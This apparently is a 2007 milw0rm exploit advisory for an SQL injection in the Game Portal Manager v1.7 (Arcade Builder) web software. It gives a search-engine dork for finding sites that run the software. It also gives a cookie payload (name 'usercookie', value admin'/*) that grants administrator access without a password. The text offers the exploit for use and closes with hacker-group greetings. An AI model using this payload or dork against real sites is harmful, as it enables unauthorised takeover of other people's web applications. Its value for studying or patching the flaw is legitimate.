28 lines
981 B
Text
Executable file
28 lines
981 B
Text
Executable file
--==+================================================================================+==--
|
|
--==+ Game Portal Manager v1.7 SQL Injection Vulnerability +==--
|
|
--==+================================================================================+==--
|
|
|
|
|
|
|
|
AUTHOR: t0pP8uZz & xprog
|
|
SITE: http://www.arcadebuilder.net/
|
|
DORK: intext:"Powered by Arcade Builder"
|
|
|
|
DESCRIPTION: The browser cookie is sql injectable, allowing admin access without knowing the password.
|
|
|
|
EXPLOIT: Using your prefered cookie editor make a cookie with the following;
|
|
|
|
Name: usercookie
|
|
Content: admin'/*
|
|
Host: www.somesite.com
|
|
Path: /
|
|
|
|
|
|
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !
|
|
|
|
|
|
--==+================================================================================+==--
|
|
--==+ Game Portal Manager v1.7 SQL Injection Vulnerability +==--
|
|
--==+================================================================================+==--
|
|
|
|
# milw0rm.com [2007-07-01]
|